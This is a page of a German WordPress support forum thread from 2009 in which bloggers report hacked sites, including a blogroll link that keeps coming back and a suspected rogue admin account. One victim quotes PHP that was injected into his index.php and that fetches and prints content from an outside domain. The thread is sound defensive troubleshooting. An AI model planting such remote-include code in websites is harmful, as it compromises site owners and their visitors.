WP 2.7 Blogroll gehackt? - Seite 2

etanera · 20.02.2009, 15:20

Ich hatte auf meinem relativ neuen Blog seit gestern einen unerwünschten Link auf meiner Blogroll. Er ließ sich nicht löschen, das heißt, er ließ sich schon löschen, tauchte aber sofort danach wieder auf.
Da ich von html überhaupt keine Ahnung habe, habe ich das Problem bei der Wordpress-Gruppe in XING gepostet und dort wurde mir schnell geholfen.
https://www.xing.com/app/forum?op=sh...84241#18598746

Sebbi · 20.02.2009, 18:02

Könntet ihr den Code, der bei euch in das Theme eingefügt wurde mal hier posten?

Eventuell auch gleich mal mittels phpmyadmin die Datenbank überprüfen, ob dort ein unbekannter Adminbenutzer in der Tabelle wp_user eingetragen ist. Vielleicht ist diese Art von Hack ja eine Abwandlung meines kleines Problems

http://forum.wordpress-deutschland.o...ne-luecke.html

sergej.mueller · 20.02.2009, 23:30

Schau mal, hab hier einen Artikel dazu verfasst: WordPress-Wurm treibt sein Unwesen: Blogger als Sicherheitsrisiko

herb37 · 23.02.2009, 09:25

Ich habe heute Morgen ein Ungereimtheit bei meinem Blog festgestell.
Oberhalb des eigentlichen Blogs war ein Hinweis, dass eine Seite nicht gefunden wurde.

Die Index.php enthielt folgenden Code:

Zitat:

<?php
if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://oupremed.com/s/23.txt");
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode("",file("http://oupremed.com/s/23.txt")); }
if($r) print $r;
?>

Der Link:

Zitat:

//oupremed.com

führt auf eine russische Seite!!

Meine Frage, wie kommt so ein Code in die Index.php
Die Kommentarfunktion habe ich schon seit längerer Zeit deaktiviert.

Vielen Dank für jeden tipp im voraus.
Gruß
Herbert

sergej.mueller · 23.02.2009, 09:27

Per FTP? Siehe meinen Artikel vom Post ein Stückchen höher.
Sonst: Welche WordPress-Version hast du denn?

sergej.mueller · 23.02.2009, 09:30

Per FTP? Siehe meinen Artikel vom Post ein Stückchen höher.
Sonst: Welche WordPress-Version hast du denn?

herb37 · 23.02.2009, 09:35

Ich verwende noch WP 1.5 - bitte nicht lachen.
Mit der Theme "classic".
Die Header.php enthält keinen auffälligen Hinweis, wie in Deinem Artikel beschrieben.

Der Code, den ich vorhin gepostet hatte, wurde ganz oben in die index.php geschrieben.

sergej.mueller · 23.02.2009, 09:59

Es kann sich dann um eine der bekannten Sicherheitslücken handeln. In den neuen WordPress-Versionen wurden diese alle geschlossen.

herb37 · 23.02.2009, 10:09

Gibt ers für einen so großen Revisionssprung eine Anleitung.
Habe so etwas noch nie gemacht, immer nur kleine "Sprünge".

sergej.mueller · 23.02.2009, 10:10

Hmm, ist mir nicht bekannt, vielleicht hier im Forum suchen.